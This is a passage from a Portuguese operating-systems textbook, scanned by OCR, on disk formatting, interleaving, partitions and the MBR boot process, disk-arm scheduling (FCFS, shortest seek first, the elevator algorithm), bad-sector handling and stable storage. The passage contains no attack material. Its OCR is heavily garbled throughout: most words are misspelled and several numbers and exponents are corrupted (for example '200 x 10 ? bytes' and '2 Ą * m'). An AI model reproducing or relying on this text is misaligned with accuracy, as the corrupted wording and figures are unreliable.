Figura 5.23. fi import antę mendonar quc o chaveamento 
entre os cabeęotes tambćm consomc um tempo finito, de 
modo qne existe mn deslocamento do cabeęote (hmd 
$kew), alćm do deslocamemo dlmdrico, embora o pritndro 
nao seja tao a cen tu a do. 

Como resuitado da formataęao de baixo mvel, a capa- 
ddadc do disco ć red u żula, dependendo dos tamanhos do 
preambuło, do intcrvalo entre setores c do ECC, bem como 
do nu mero dc setores sobressakmes reservado5, Muitas 
vezes a eapaddadc após a formataęao ć 20 por cento menor 
do que a capaddade original (sem formataęao}. Os setores 
sobressalentes nao sao considerados na capaddade após a 
formataęao, de modo que todos os discos de urn dado lipo 
possuem exatainente a mesma capaddade quando uliliza- 
dos, independentemente de quamos setores danificados 
eles realmente tern (se o inimero de setores danificados ex- 
ceder o mimero de setores sobressalentes, o disposilivo sera 
rejeitado e nao enviado}. 

Ha muita confusao sobre a capaddade do disco porque 
alguns fabricantes anunciam a capaddade sem formataęao 
para parecer que os dispositivos sao maiores do que eles 
realmente sao. Por exemplo, considere um dispositivo cuja 
capaddade sem formataęao seja de 200 x 10 ? bytes. Ele 
pode ser vcndido como um disco de 200 GB. Entretanto, 
após a formataęao, talvez somente 170 x t0 y bytes estejam 
realmente dispontvcis para dados. Para aumentdr a confu¬ 
sao. o sistema operadonal provavdmente vai considcrar 
essa capaddade como sendo dc I 58 GB. e nao 170 GB, pois 
o software considcra I GB como 2™ (1.073*741*824) bytes, 
e nao IG 9 (um bilhao de) bytes. 

Para tornar as coisas ainda piores, no mundo da co- 
mimicaęao dc da dos, 1 Gbps significa um bilhao dc bits por 
segundo, pois o prefixo 'giga' realmente significa \0' } (um 
quilómctro e mil metros, e nao 1,024 metros), Somente 
para os tamanhos de memória e de disco e que as medidas 
quilo, mega, giga e tera indicam 2 30 , 2 20 , 2 ,0 e 2 30 , respecii- 
va menie. 

A formataęao tambćm a feta o desempenho* Se um dis¬ 
co de 10 mil rpm tem 300 setores por trilha dc 512 bytes 


cada urna, ele leva 6 ms para ler os 153.600 bytes de urna 
trilha se considerarmos uma taxa de 25.600.000 bytes/s ou 
24,4 MB/s. Nao e posswel ir mais rapido do que isso r inde¬ 
pendent emente do tipo de interface presentc, mesmo quc 
ela seja uma interface SCSI dc 80 MB/s ou ióO MB/s. 

Ler contirmamenie nessa iaxa de fato reąuer um buffer 
de grandę capaddade no controlador. Considere, por exem- 
plo, um controlador com um buffer de um setor para o 
qual foi passado um comando para a leitura consecutiva 
de dois setores. Após a leitura do primeiro setor do disco 
e o calculo do ECC, os dados devem ser transferidos para 
a memória principaL Enąuanto a transferencia esta sendo 
fcita, o setor seguinte passara pclo cabeęote. Quando a có- 
pia para a memória cstivct complcta, o controlador tera dc 
esperar quase o tempo dc uma rotaęao compkta para quc 
o segundo setor esteja pródmo mwamenie. 

Esse problema pode ser elinunado numerando-se os 
setores de maneira entrelaęada durante a formataęao do 
disco. Na Figura 5.24(a), vemos a numeraęao comencio- 
nal (ignorando, nesse caso, o deslocamento dc cilindro). Na 
Figura 5.24(b) obscrva-se um entrdaęamento simples 
(single interleaving), que forncce ao controlador um certo 
descanso entre os setores consecutivos, de modo a permitir 
a cópia do buffer para a memória principaL 

Sc o proccsso de cópia ć muito lento, o eiitrelaęa- 
mento duplo {double hiterkaying) da Figura 5,24(c) pode 
ser necessario, Sc o controlador tem um buffer de somente 
um setor, nao importa sc a cópia do buffer para a memória 
principal ć feita pclo controlador, pda CPU principal ou por 
um chip de DMA; ela ainda leva algum tempo. Para evitar 
a necessidade de emrelaęamento, o controlador deveria ser 
capaz de colocar no buffer uma trillia inteira. Muitos con¬ 
tro lad ores modernos po dem fazer isso. 

Após a formataęao de baixo nivd estar completa, o 
disco ć dividido em partięoes, Do ponto de vista lógico, 
cada parttęao e tratada como um disco sępa rado. Sao as 
partięoes que viabi1i/am a coexisLencia de sistenias opera- 
cionais. Em alguns casos r elas tam bem podem ser tuilizadas 
como area de troca (swap space). No Pentium e na maio- 
ria dos outros computadores, o setor 0 contem o registro 
mestre de inidalizaęao [master boot record - MBR), que 
apresenta um código do boot alem da tabela de partięoes 
no finał. A tabela de partięoes fornecc o setor inicial e o 
tamanho de eada partięao. No Pentium, a tabela de par- 



Figura 5.24 (a) Sem entreJacamento, (b) Entrelacamento simples. (c) Entrelacamento dupio. 
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tięoes lem entradas para ąnatro partięoes. Se todas forem 
usadas pelo Windowy elas serao chamadas de C:, I):, E: e F: 
c traladas como dispositivos scparados. Sc trćs dclas forem 
usadas pele Windows e unia for usada pelo UNIX f entao o 
Windows chama ra suas partięoes de C:, D: e E:. Portanto, o 
primeiro CD-ROM sera F:. Para ser capaz de reaiizar a ini- 
cializaęao do sistema a pa i Lir do disco ngklo, urna partięao 
deve ser marca da como ativa na tabela de partięoes. 

O passo finał na prcparaęao dc um disco para nso e 
executar inna forirmtaęao de alto nfvel de cada partięao 
(separadamente), Essa operaęao inscre um bloco dc inicia- 
lizaęao, a estru tura dc gcrcnciamcnto dc a ima zen a ni cm o 
livrc (lista de blocos livres ou mapa de bits), o diretório- 
-raiz c um sistema dc arquivos vazio. Ela tambem coloca 
um código na entrada da tabela dc partięoes informando 
qnal c o sistema de arquivos usado na partięao, pois muitos 
sistemas operarionais aceitam varios sistemas de arquivos 
incompaiweis (por razoes históricas). Nesse porno, o sislc- 
ma pode ser i ni ciał i za do. 

Quando a energia e ligada, a BIOS enira em execuęao e 
entao carrega o registro mestre de inidalizaęao e salta para 
elc. Esse programa dc inicializaęao vcrifica qual partięao 
esta ativa. A partir disso, ele carrega o setor de inicializaęao 
espedfico daąuela partięao e o executa, Esse setor eon tern 
um pcąueno programa ąuc procura outro programa no 
diretório-raiz (ou o sistema operacional ou um carregador 
de urna inicializaęao maior — imistmp). Esse programa e, 
entao, carregado na memória e execulado. 

5,4,31 Algoritmos de escalonamento de 
braęo de disco 

Nesta seęao, veremos algumas ąuestoes gerais relacio- 
nadas aos drivers dc disco. Primeiro, considere o tempo 
que ele lcva para icr ou escrever um bloco do disco. O tem¬ 
po necessado e determinado por tres fatores: 

l H Tempo de p osi aorta men to [o tempo necessario para 
mover o braęo para o eilindro correto). 

2. Atraso dc rotaęao (o tempo nccessario para rotar o 
setor correto sob o cnbcęote dc ldtura/gravaęao)* 

3. Tempo de transie ren ci a real do da do. 


Para a maioria dos discos, o tempo de posicionamento 
e preponderante sobre os outros dois tempos, de modo que 
a reduęao no tempo medio de posicionamento pode me- 
Ihorar substancialmcnte o desempenho do sistema. 

Se o driver do disco recebe reąu isięoes u ma após a ou- 
tra e atende a todas na orderu em que das foram recebidas, 
isto e, 'primeiro a chegar, primeiro a ser servido' ( firn - 
-come, first-served — FCFS), quase nada pode ser feito para 
ot i mi za r o tempo de posicionamento. No entanto, outra 
estrategia pode ser usada ąuaiido o disco esta totalmente 
carregado. Existe grandę probabilidade de que, quando o 
braęo esta sendo posidonado de acordo eom alguma rc- 
ąuisięao, outras rcquisięocs podem sergeradas por outros 
processos. Muitos drivers dc disco mantem unia tabela, im 
dexada pelo numero do eilindro, com todas as reguisiędes 
pendentes para cada eilindro entadeadas juntas em u ma 
lista ligada encabeęada pela entrada da tabela. 

Considerando esse tipo de estru tura de dados, pode- 
mos melhorar o desempenho alem do obtido pelo algo- 
ritmo FCFS. Para saber como fazc-io, considcrc um disco 
imaginario com 40 eilindros. Unia reąuisięao chega para a 
leitura de um bloco no eilindro 11, Enquanto um posirio- 
namemo para o eilindro I i esta sendo feito, novas requi- 
sięoes chegam para os eilindros 1, 36, I6 t 34, 9 e 12, nessa 
ordem. Elas sao colocadas na tabela de requisięóes penden¬ 
tes, com uma lista liga da sępa rada para cada eilindro. As 
requisięoes sao mostradas na Figura 5.25. 

Quando a reąuisięao atual (para o eilindro ! 1 j c fina- 
lizada, o drivcr do disco tern urna escollia de qual requisi- 
ęao sera a próxima a ser tratada. Usando FCFS, o eilindro 
1 seria o próximo, depois o 36, e assim por diante. Esse 
algoritmo precisara posicionar o braęo nos eilindros requi- 
siLados, percorrendo sobre 10, 35, 20, IS, 25 e 3 eilindros, 
respectivamente, somando unia distancia total de 111 d- 
lindros percorridos. 

Alternativamente, ele sempre poderia tratar a próx> 
ma requisięao como sendo aquda mais próxima da posięao 
atual do cabeęote de leitura/gravaęao, a firn de minimizar o 
tempo de posicionamento. Considerando as requisięoes da 
Figura 5.25, a sequencia seria 12, 9, ló, l r 34 e 36, como 



I Figura 5.25 Aigoritmo de escalonamento 'posicionamento mais curto primeiro 1 (SSF). 
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mosira a linha com quebras irregulares na base da Figura 
5.25. Com essa seąuencia, os movimentos do braęo sera o 1, 
3, 7, 15, 33 c 2, totalizando mna distanda de 61 dlindros. 
Esse algoritmo, posidonamento mais curto primeiro 
(shortest seek first — SSF), rcduz pcla metade o total dc mo- 
vimentaęao do braęo sc comparado com o FCFS, 

Infelizmente, o SSF apresema um próbie ma. Suponha 
que mais requlsięoes sejam recebidas enquanto as requisi- 
ęoes da Figura 5.25 estao sendo processadas. Por exemplo, 
se, após ir para o dlindro 16, diegar u ma nova requisięao 
para o dlindro 8, csta tera prioridade sobie o cilindro 1. 
Logo depois, sc unia outra rcąuisięao chegar para o ciiin- 
dro 13, o braęo ira para esse dlindro cni vcz de se dirigir 
ao dlindro 1. Com um disco totalmente carregado, o braęo 
tendera a permanecer no mdo do disco na maior parte do 
tempo, de modo que as requisięoes para os dlindros extre- 
mos terao de esperar a te que uma osrilaęao estatfsrica na 
carga de trabalho elimine qualquer requisięao próxima do 
meio. As reąuisięoes distantes do meio podem obter um 
servięo mim. Os objetivos de mfnimo tempo de resposta e 
de justięa sao conflitantes nesse caso. 

Os grandes edifkios tambćm enfrenlam esse dikma, 0 
problema do e scalona me nto de um devador em um pre- 
dio de muilos andares e simiiar aąuele do escalonainemo 
de um braęo de disco. As requisięoes chegam em chama- 
das conlinuas ao devador, vindas alcatoriamcme dos dife- 
rentes andares (dlindros). O computador que com roi a o 
elevador fadlmente poderia manter a sequenda na qual 
os dientes pressionaram o botao de cha ma da e servi-los 
usando o FCFS ou o SSR 

Contudo, a maioria dos elevadores usa um algorit- 
mo diferente para recondliar os objęlivos conflitantes de 
dicienria e justięa: des se movem em urna mesma direęao 
atc na o haver mais requisięóes pendentes naquela direęao, 
quando, entao, trocam de direęao* Esse algoritmo, conhe- 
ddo (tanto no universo dos devadores como no dos dis- 
cos) como algoritmo do elevador, predsa que o software 
mantenha um bit: o bil da direęao atual, SOBE ou DESCE. 
Quando urna requisięao e concluida, o driver do disco ou 
do devador verifica o bit. Se de contem SOBE, o braęo ou 
a cabine se move para a próxima requisięao pendeme Ime- 

Posięao inicial 


diatamenie acima. Se nenhuma requisięao esta pendeme 
nas posięóes superiores, o bit de direęao e invertido. Quan- 
do o bit contem DESCE, o movimento e feito para a próxi- 
ma solidtaęao imediatamente abaixo, caso exista uma. 

A Figura 5.26 mostra o algoritmo do eleuador usando 
as mesmas sete requisięoes da Figura 5.25, presumindo que 
o bit de direęao seja inirialmeme SOBE . A ordem na qual os 
eilindros saoatendidos e 12,16, 34, 36, 9 e 1, percorrendo as 
seguintes distandas enire eilindros: 1, 4, 18, 2 r 27 e 8, tota¬ 
lizando 60 dlindros. Nesse caso, o algoritmo do elcvador — 
c mb ora seja, cm gerał, interior — e ligeiramente melhor do 
que o SSF. Uma propriedade posiliva do algoritmo do elc- 
vadoi c quc dado qualqucr conjuiito dc rcqiiisięoes, o valor 
maximo para a distancia total e fixo: duas vezcs o numero 
de eilindros, 

Uma ligeira modificaęao desse algoritmo e que pro- 
pordona uma pequena variaęao nos tempos de resposta 
(Teory, 1972) consiste em sempre varrer as reąuisięoes em 
uma unica direęao* Quando o dlindro dc nu mera ęa o mais 
aha (quc estava pendeme) acabou dc ser atendido, o braęo 
vai para o cilindro de numcraęao mais haixa (no senlido 
oposlo) e enlao i ccomcęa o atendimento movendo-sc no- 
vamente de baixopara cima. Consequentememe, conside¬ 
ra-se que o cilindro de numeraęao mais baixa se encontra 
sobre o cilindro de numeraęao mais aha. 

Algurts controladores de disco fomecem mci os para 
permitir ao software inspecionar o numero do setor atual 
quc esta sob o cabeęote dc leitura/gravaęao. Com esse con- 
trolador, outra otimizaęao e possfvd* Se duas requisięoes 
ou mais estao pendentes para o lnesmo cilindro, o driver 
pode emitir uma requisięao para o setor que passara sob o 
cabeęote em seguida. xVote que, quando varias trilhas es¬ 
tao presentes em um dlindro, as requisięoes consecutivas 
podem ser atendidas para diferentes trilhas sem nenhuma 
penalidade. O eontrolador pode seleclonar imediatamente 
qualquer um dc scus cabeęotes, pois a cscolha do cabeęote 
nao envolvc movimentaęao do braęo nem atraso rotacional, 

Se o disco pcrmile que o tempo de posicionamento 
seja muito mais rapido do que o tempo de rotaęao, etitao 
deveria ser usada uma estrategia de otimizaęao difereme* 
As requisiędes pendentes deveriam ser ordenadas pdo nu- 



l Figura 5.26 O algoritmo do elevador para escabnamento de solioitacoes do disco. 
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mero do setor e, tao logo o próximo setor estivesse para 
passar sob o cabeęote, o braęo deveria ser movido para a 
trilha correta para a leitura ou a escrita nele. 

Com urn disco rfgido moderno, os tempos de posicio- 
namento e rotaęao sao tao delenninantcs do desempenho 
quc a leitura de um ou dois setores de unia ve 7. e minio 
inellcieme. Por essa razao, muitos controladores de disco 
leem sempre varios setores, colocando-os em ca che, mes- 
mo ąuando somente um setor e reąuisitado. De modo ge- 
ral, qualqticr solicitaęao dc leitura dc um seior fara com 
que esse setor e muitos setores da irilha atual (ou todos 
eles) sejam lidos, dependendo de ąuanto espaęo esteja dis- 
pomvel na memória ca che do comrolador. O disco descrito 
na Tabela 53 possui urna cachc de 4 MB, por exemplo, O 
uso da eache e determinado dinamieamenle pelo coniro- 
lador. Em scu modo rnais simplcs, a cachc e dmdida em 
duas scęocs, urna para lcituras e outra para cscrilas. Sc urna 
leitura $ubsequente ć passfvd de ser satiskita com a cachc 
do comrolador cle pode retor nar i media ta menie os dados 
reąmsłtados. 

Ś im port a me notar que a cache do comrolador do 
disco c compietamente independente da cache do sistema 
operacional, A cachc do comrolador cm gcral eon tein blo- 
cos quc nao foram dc falo reąuisitados, mas que era con- 
vc n ieme quc fossem lidos, porque passa ram sem quercr 
sob o cabeęote durante outra leitura. Em contrapartida, 
qualqucr cache mantida pclo sistema operacional consisti- 
ra de blocos quc foram expliritamente lidos e que o sistema 
operacional julga que possam ser neccssarios em um futuro 
próximo (por excmplo, um bloco dc disco com cudo um 
bloco dc di retem o). 

Quando varios dispositivos estao presentes no mesmo 
comrolador, o sistema operacional devcria manier urna 
tabela dc reąuisięocs pendenies para cada disposilivo cm 
separado. Sempre que qiialquer dispositivo cstivessc ocio- 
so, um comando dc posidonamento dcvcria ser cmitido 
para mover scu braęo para o ciii miro onde de sera necessa- 
rio para o próxi.mo acesso (presummdo que o comrolador 
permita posicionamcntos stmultancos). Quando a transfe- 
rencia atual lermina, urna verifkaęao pode ser fdta para 
averiguar se os dispositivos estao postcionados no cilindro 
correlo. Se um ou mais estao, a próxima transferencia pode 
ser inicializada em um dispositivo que ja se encomre no ci- 
tindro correlo. Sc nenii um dos braęos esta no local correlo, 
o driver de disco deve emitir um novo comando de posicio- 
namento sobre o dispositivo que acabou de completar urna 
transferencia e esperar a te a próxima mterrupęao para ver 
qual braęo alcanęou seu destino em primdro lugar. 

E importanie eniender que todos os algoritmos de es- 
calonamento dc disco descritos anteriormente pressupocm 
que a geometria do disco real seja a mesma da geometria 
yirtual. Se essa suposięao nao e l erdadeira, o esca łona men - 
to das reątusięoes de disco nao tern nenhum sen [ido, pols 
o sistema operacional nao pode realnienie ilizcr se e o d- 


lindro 40 ou o cilindro 200 que esta mais próximo do d- 
lindro 39. Por ouiro lado, se o comrolador do disco e capaz 
dc aceitar varias reąuisięoes pendent es, de pode usar esses 
algoritmos de escalonaniento internamente. Nesse caso, 
os algoritmos ainda sao validos, mas em um mvd abaixo, 
dentro do comrolador. 

5.4.41 Tratamenło de erros 

Os fabricantes dc disco estao constamemcntc foręan- 
do unia expansao dos limites da tccnologia por meto do 
aumento linear das densidades dc bits. Uma trilha central 
de um disco dc 5,25 polega das possui urna circunferencia 
próxima de 300 mm, Se a trilha contem 300 setores de 
512 bytes, a densidatk de gravaęao linear pode ser algo em 
toino de 5,000 bits/mm, lcvando em eonsideraęao o lato 
de que algum espaęo e perdido com preambulos, ECCs e 
interva]os entre setores, A gravaęao dc 5.000 bits/mm exi- 
ge um sub strato extrema menie tm i formę e uma ca mada 
mnito fina de óxido. Infelizmeme, nao e poss(vel fahricar 
um disco com tais especificaęoes que nao apreseme defci- 
los. Asslm que a tccnologia dc fabricaęao permUir que se 
operc com seguranęa nessas densidades, os projetisias de 
disco parlirao para densidades maiores, a firn de aumeniar 
a capacidade, Fazcndo isso, os defeitos provavelmeme rea- 
paręcera o, 

Com os defeitos de fabricaęao surgem os setores defci- 
uiosos, Ssto e, setores onde os valores escrHos nao sao lidos 
corretamente de volla. Se o dcleito e muflo peąucno — 
digamos, dc apenas alguns bits —, ć possivcl usar o seior 
defeituoso e simplesmerne dcixar que o ECC corrija os er¬ 
ros toda vez. Se o defeito for grandę, o cno nao podera ser 
masearado, 

Existem duas soluędes gerais para os blocos deleituo- 
sos: trata-los via comrolador ou via sistema operacional. 
Na primeira abordagem, antes que o disco seja enviado da 
fabrica, dc c testado e urna lista de setores ruins c gravada 
nele, Cada setor defdtuoso e substitindo por um dos de 
reserva, 

Exjstem duas maneiras dc lazer essa subsiituięao. Na 
Figura 5.27(a), vemos uma unica trilha de disco com 30 
setores de dados e dois setores reservas. O setor 7 e de- 
feituoso. O que o comrolador pode fazer e remapear um 
dos reservas como sendo o setor 7 r como mostra a Figura 
5.27(b). A outra safda e deslocar todos os setores de uma 
posięao, como mostra a Figura 5.27{c). Em ambos os casos, 
o comrolador tern de saber quai setor e qual. Ele pode man¬ 
ier essa informaęao em tabelas internas (uma por trilha) ou 
reescrever os preambulos para inserir o novo nu mero dos 
setores remapeados. Se os preambulos sao reescritos, o me¬ 
todo da Figura 5.27(c) e mais trabalhoso (lima vez que os 
23 preambulos devem ser reescritos) mas fornece melhor 
desempenho, pois toda uma trilha ainda pode ser lida em 
uma unica rotaęao. 
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I Figura 5.27 (a) Urna tri I ha de disco com seior defeituoso, (b) Substituięao do setor defeituoso por um setor resewa. 
(c) Deslocamento de todos os setores para putar o setor defeituoso. 


Os erros tambem podem suTgir duranie a operaęao 
normal após o dispositivo ter sido instalado. A primeira ten- 
iativa de resgatar urn erro que o HCC nao e capaz de tratar 
e simplesmente lentar ler de novo o setor. Alguns erros de 
leitura sao transientes — isto e, causados, por exempIo, por 
particulas de podrą sob o cabeęote dc leitura/gra vaęao — 
e dcsaparccem cm unia segunda tentativa. Sc o controla- 
dor notar quc determinado setor esta causando repetidos 
erros, dc pode troca-to por um setor rcscrva antes quc o 
setor lenha se danificado por compkto. Dcssc modo, nc- 
nKum dado e perdido e o sistema operacional, bem como 
o usuario, nao percebem o problema. Em gerab o metodo 
da Figura 5.27(b) leni de ser usado, visto que os outros 
setores agora podem conter dados. Aplicando o metodo da 
Figura 5.27(c) r sera predso reescrever os preambulos, alem 
dc tambem copiar todos os dados. 

Dissemos anteriormente quc existem duas abordagens 
gerais para o tratamemo dos erros: tratamento via contro- 
lador oli via sistema operacional. Se o com rola dor nao tern 
a capaddade de remapear setores transparememente como 
discutimos aqui, o sistema operadonal deve fazer o mesmo 
em software, lsso signifka que ele deve primeiro adąuirir 
uma lista de setores ruins, ou por meio da leitura destes a 
partir do disco, ou simplesmente testando o disco todo por 
si próprio. Uma vcz que de sabc quais setores estao ruins, 
pode construir as tabelas dc remapeamento. Sc o sistema 
operacional optarpor usara abordagem da Figura 5.27(c), 
de devera deslocar os dados dos setores 7 a 29 de um setor 
para ci ma, 

Se o sistema operacional esta tratando o remapeamen¬ 
to, de precisa ter certeza dc que os setores defeituosos nao 
estao cm nenhuni arquivo, nem na lista dc blocos livres 
nem no mapa dc bits. Uma nianeira dc fazer isso ć criar 
um arquivo seereto quc consista cm todos os setores de¬ 
feituosos. Sc esse arquivo nao e conhecido pdo sistema de 
arquivos, os usuaiios nao o poderao ler 'sem querer' (ou, 
piór ainda, libera-lo para uso), 

Contudo, ainda exisre outro problema: os backups. 
Quando c feito um backup do disco, arquivo por arquivo, 
ć importante quc o utilitario usado para copiar nao tente 
copiar o arquivo com o bloco defeituoso. Para cvitar essa 


siiuaęao, o sistema operacional deve esconder o arqmvo 
com o bloco defeituoso tao bem que mesmo um tuilitario 
de cópia nao consiga encontra-Io. Se o disco e copiado setor 
por setor, em vez de arquivo por arquivo, sera diffril, se nao 
impossfyel, iivrar-se dos erros de leitura durante a cópia. 
A unica esperanca e que o programa de cópia seja esperto 
o sufidemc para desistir de copiar aquele setor após dcz 
tcntativas frustradas c prosseguir com a cópia dos setores 
restantes. 

Os setores defeituosos nao sao a unica fonie de erros. 
Podem ocorrer erros de posicionamento causados por pro- 
blemas mecanicos no braęo. O controlador mantem in- 
ternamente o controle da posięao do braęo. Para cxecutnr 
um posicionamento, cle emite uma serie de puls os para 
o motor do braęo (um pulso por cilindro), a fini de mo- 
ver o braęo para o novo cilindro. Quando o braęo alcanęa 
scu destino, o controlador le o nu mero do cilindro atual 
do preambuło do setor seguinte. Se o braęo esta no local 
errado, ocorre um erro de posicionamento, 

A maioria dos comroladores de disco rigido corrige os 
erros de posicionamento automaticamente, mas a maior 
parte dos controladorcs dc discos flexiveis (induindo os 
do Pentium) apenas sinaliza um bit de erro c dcixa o res¬ 
tante para o driver. 0 drivcr trata esse erro por meio da 
emissao de um comando recalibrato, para mover o braęo 
tao distame quamo de possa e reajustar o vaior interno 
deste cilindro, mantido pelo controlador, para 0, Em geral 
isso resolve o problema. Caso conlrario, o dispositivo deve 
ser reparado. 

Como vimos, o controlador e de fato um computador 
peąueno e especiabzado, compkto: com software, varia- 
veis, buffers e, ocaslonalmente, erros. Algo mas vezes, uma 
sequencia incomum de eventos, como uma imerrupęao 
em um dispositivo, que ocorre simulianearnenie com o 
comando recalibrate em outro dispositivo, desencadeia um 
erro e faz com que o controlador entre em um laęo infini- 
to ou perca o caminho daquila que de estava fazendo. Os 
projetistas de controlador es normal men te pianej am con- 
siderando as piór es hipóteses, e assim fornecem um pino 
no chip que, quando sinalizado, faz com que o controlador 
esqueęa o que estava fazendo c rei nici e novamente, Assim, 
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se ocorre qualquer falha, o driver pode iiwocar esse sinal 
e reiniciar o controlador. Se isso nao resolve, só resta ao 
driver iniprimir u ma mensa gem e desistir. 

A reealibragcm de um disco faz um barulho eslranho 
mas, de qualquer modo, nao incomoda. Coniudo, existe 
urna situaęao em que a recalibragem e um problema se- 
rio: os sistemas com restrięoes de tempo real Quando um 
vfdeo esta sendo re pro duzi do a partii - do disco ngido on 
os arquivos de um disco ngido estao sendo gravados em 
um CD-ROM, e fundamenta! que os birs clieguem do disco 
ngido em urna tasa uniformc. Sob essas circunstancias, a 
recalibragem inscre mtervalos dentro de um fluxo de bits, 
sendo, portanto, inacdtavd. Alguns disposiiivos cspctiais, 
chamados dc discos AV {audiovisuais), nunca rccalibram 
c estao disponfveis para essas aplicaęoes. 

5A51 Armazenamento estavel 

Cotiforme vimo$, os discos algumas vczes geram erros. 
Os sc tor es bons podem repentinamenle aprcsentar dcfd- 
tos. Um dispositiyo pode pifarcompietamenie de urna hora 
para outra. A tecnologia RAID protege contra alguns seto- 
res que csiao aprescniando defeito on mesmo contra um 
dtsposiiivo quc venha a falliar por completo. Emretanio, 
cla nao protege contra erros de gravaęao que tnserem da- 
dos corrompidos. Tampon co protege conira a queda do sis- 
tema durame a gravaęao, que co r rampę os da dos originais 
sem substkuHos por dados mais novos. 

Para algumas aplięaędes, e essencial que os dados nun¬ 
ca sejam perdidos on corrompidos, mesmo na presenęa de 
erros do disco on da CPU. Em termos ideais, um disco de- 
veria simpiesmente trabalhar todo o tempo sem falhar. Jn- 
fclizmcntc, isso nao ć possive!. O possfvel e o subsistema dc 
um disco ter a seguintc propriedade: ąuando unia cscrita e 
lanęada para ele, ou o disco escreve corretameme o da do 
ou nao escrevc nada, deixando os dados existentes intac- 
ioś. Esse sistema e cha mado de armazenamento estavel 
e e im ple men la d o cm software (Latupson e Sturgis, 1979). 
O objęlivo e mantcr o disco comistcnte a todo aisto* A sc- 
guir, inostraremos u ma pequcna variame da kicia odginał. 

Antes de dcscrcver o algoritmo, e importante ter um 
modeJo claro dos erros possfveis. O modelo presume que, 
ąuando um disco escreve um bloco (um ou mais setores), a 
escrita e co r rei a ou e incorrela, e esse erro pode ser detec¬ 
tado na leitura seguime por meio da verificaęao dos valores 
dos campos ECCs. A princfpio, a detecęao segura de erros 
nunca e possfvel porque com um ca nipo ECC, digamos, de 
16 bytes, protegendo um setor de 512 bytes, existem 2 Ą * m 
valores de dados e s omen te 2 m yalores de ECC. Assim, se 
um bloco e distorcido durame a escrita mas o ECC nao o e, 
existem bilhoes de bilhocs de combinaęocs incorrctas quc 
produzem o mesmo ECC. Se alguma delas ocorrer, o erro 
nao sera detectado. Em geral, a próbabilidadc de um da do 
alcatório ter o mesmo ECC de 16 bytes e de cerca dc 2 mUĄ — 


próbabilidade pequena o sufleiente para a considerarmos 
nula, mesmo que realnienie nao seja. 

O modelo tambem presume que um setor escrito de 
modo correto pode espontaneamente Ikar defeitnoso e se 
lornar ilegiveL Comudo, supoe-se que e$se$eventos sejam 
tao raros que a possibilidade de um mesmo setor apresen- 
lar defeito em um segundo disco (independente) durame 
um imervaio razoavel de tempo (por exemplo, um dia) e 
peąuena o sufleiente para ser ignorada. 

O modelo tambem presume que a CPU pode falhar, 
e, nesse caso, ele simpiesmente para. Qualquer escrita no 
disco em andaniemo no momentu de falha tambem e in- 
lerrompida, causando dados incorretos em um setor e um 
ECC incorreto que pode ser detectado posteriomieme. Sob 
essas condięoes, o armazenamento estavel pode se lornar 
100 por cento confiavel no qual as escritas irabalham cor- 
retamente ou deixam os antigos dados no locaL Obvia- 
mente, ele nao protege contra desa stres fisicos, como um 
terremoto, em que o computador despenąue cem metros 
dentro de urna fenda e caia em uma poęa de magma em 
cbulięao, & difidl safvar o software desse tipo de problema, 

O armazenamento estavei usa um par de discos identi- 
cos com os blocos cor respondent es trabalhando juntos para 
formar um bloco livre de erro. Na ausencia dc erros, os blo¬ 
cos correspondentes em ambos os discos sao iguais. Qnal- 
quer um deles pode ser lido para gerar o mesmo resultado. 
Para alcanęar esse objęlivo, as tres operaęoes segnimes sao 
definidas: 

1. Escritas estaveis* Uma escrita esiavel consiste em 
primeiro escrever um bloco na unidade I e H em se- 
gnida, ler o mesmo dado de volta para verificar se 
ele foi escrito corretameme. Se ele nao foi escrito 
do modo certo, a escrita e a leiuira sao refeitas no- 
yamente durame n vezes ate que estejam corretas. 
Após n falhas consecutivas, o bloco e remapeado 
sobre um bloco reserva e a opera 910 e repetida ate 
que seja bem-sucedida, nao imporiando ąuantos 
blocos reservas Lenham de ser teniadas. Após a es¬ 
crita na unuladc 1 ter sido bem-sucedida, o bloco 
correspondente e escrito e relido na unidade 2 , re- 
petidamenie se necessario, ate que a operaęao te- 
nha sucesso. Na ausencia de falhas da CPU, ao finał 
de uma escrita estavel, o bloco tera sido escrito e 
testado corretameme em ambas as unidades. 

2* Leituras estaveis. Uma leitura estavel le primeiro 
o bloco da unidade l. Se essa unidade p rod u z um 
ECC incorreto, a leitura c tema da novamcnte n ve- 
zcs. Sc lodas etas geram ECCs defciiuosos, o bloco 
correspondente e lido da unidade 2. Considerando 
o fato de que uma cscrita estavel bem ■ su ced i da dci- 
xa duas cópias boas de um bloco e nossa suposięao 
de quc ć desprczwel a probabilidade de o mesmo 
bloco espontaneamente aprcsentar defeito em ani- 
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bas as unidades em uin intervalo de tempo razoa- 
vel r sempre sera possfvel uma lei tura estavel. 

5. Recuperaęao de falhas. Após inna fallia do mis¬ 
terna (crash), um programa de recuperaęao varre 
ambos os discos comparando os blocos correspon- 
dentes. Se um par de blocos esta bom e ambos sao 
iguais, nada e feito. Se um deles apresenta um erro 
de ECC o bloco dcfcituoso e rccscrito com o bloco 
bom correspondcnte* Sc um par de blocos e bom 
mas ambos sao difcrentcs, o bloco da unidade I e 
re escrita sobre o da unidade 2, 

Na ausencia de falhas da CPU, esse esąuema fundo- 
na, pois as escritas estaveis sempre escrevem duos cópias 
validas dc ca da bloco e supoe-se que os erros espontaneos 
nulica ocorram sobre ambos os blocos correspondentes no 
mesmo tempo. O que acontcoe na presenęa de falhas na 
CPU du ran te as escritas estavcis? Isso depende prccisa men¬ 
ie do monienlo da ocorrencia da fallia, Existem dneopos- 
sibilidadeSn como mosmi a Figura 5.28. 

Na Figura 5.28(a) r a fallia da CPU ocorre antes de urna 
das dtias cópias do bloco ser cscrita. Durante a recuperaęao, 
nenhuma das duas sera trocada c o valorantigo continuara 
a cxistir, o que c pcrmitido* 

Na Figura 5.28(b), a CPU falha durante a escrita na 
unidade 1, destruindo os conteudos do bloco. Comudo, o 
programa de rccuperaęao detecta esse erro e restaura o blo¬ 
co na unidade 1 a partir da unidade 2. Assiin r o efeito da 
falha e apagado e o estado atitigo c totalmente restaurado, 
Na Figura 5.28 (c), a falha da CPU acontece após a es- 
crita na unidade 1, mas ames da escrita na unidade 2. Nes- 
se caso, nao existe a necessidade de desfazer a operaęao: o 
programa de recuperaęao copia o bloco da unidade 1 para 
a unidade 2. A escrita e be m-suce di da. 

A Figura 5,23(d) e semelhante a Figura 5.28(b): du- 
rante a reaiperaęao, o bloco bom sobrepoe-se ao bloco de- 
feituoso. O valor finał de ambos os blocos e o novo. 

Por firn, na Figura 5.28(e), o programa de rccuperaęao 
percebe que ambos os blocos sao o mesmo, dc modo que 
nenhum deles ć trocado c a cscrita, nesse caso, tambem e 
